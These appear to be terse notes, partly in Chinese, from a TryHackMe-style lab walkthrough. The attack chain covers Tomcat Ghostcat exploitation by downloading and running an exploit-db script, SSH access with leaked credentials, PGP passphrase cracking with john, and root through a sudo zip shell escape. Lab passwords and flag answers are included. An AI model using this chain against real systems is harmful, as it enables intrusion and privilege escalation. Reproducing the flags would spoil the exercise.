nmap -A 10.10.9.138
searchsploit AJP
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion
wget https://www.exploit-db.com/download/48143
mv 48143 48143.py
python 48143.py
skyfuck
8730281lkjlkjdqlksalks
ssh skyfuck@10.10.9.138
scp -r skyfuck@10.10.9.138:/home/skyfuck .
/home/merlin
發現 user.txt
THM{GhostCat_1s_so_cr4sy}
我們剛剛下載到一個 asc 檔案 跟一個 pgp 檔案
file
觀察他們是什麼.pgp
是加密後ㄉ東西.asc
的是 private keypgp 轉 john
gpg2john tryhackme.asc > john_gpg
.asc
的 private key 檔案求密碼用 john 爆破,With rockyou.txt
john john_gpg --wordlist=/opt/rockyou.txt
alexandru
gpg --decrypt credential.pgp
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
su merlin
sudo -l
(root : root) NOPASSWD: /usr/bin/zip
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
root.txt
: THM{Z1P_1S_FAKE}